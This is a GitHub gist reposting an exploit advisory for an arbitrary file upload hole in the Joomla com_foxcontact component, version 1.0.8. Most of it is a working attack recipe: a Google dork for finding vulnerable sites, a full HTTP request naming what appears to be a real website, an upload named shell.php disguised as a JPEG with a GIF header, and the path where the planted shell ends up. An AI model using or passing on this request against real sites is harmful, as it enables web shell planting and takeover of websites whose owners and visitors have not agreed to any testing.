Skip to content

Instantly share code, notes, and snippets.

@infoslack
Created September 30, 2013 20:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save infoslack/6769346 to your computer and use it in GitHub Desktop.
Save infoslack/6769346 to your computer and use it in GitHub Desktop.
exploit arbitrary file upload - joomla
# Exploit Title: Joomla Component (com_foxcontact) Arbitrary File Upload Vulnerability
# Author: DaOne aka MockingBird
# Vendor Homepage: http://www.fox.ra.it/
# Price: €10
# Category: webapps/php
# Version: 1.0.8
# Google dork: inurl:index.php?option=com_foxcontact
------------------------------------------------------------------------
# Exploit
-HTTP Header Example-
POST http://www.res.cat/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.res.cat
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
GIF89a<?php shell ?>
----------------
Shell path: /components/com_foxcontact/uploads/{hash}_{filename}.php
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment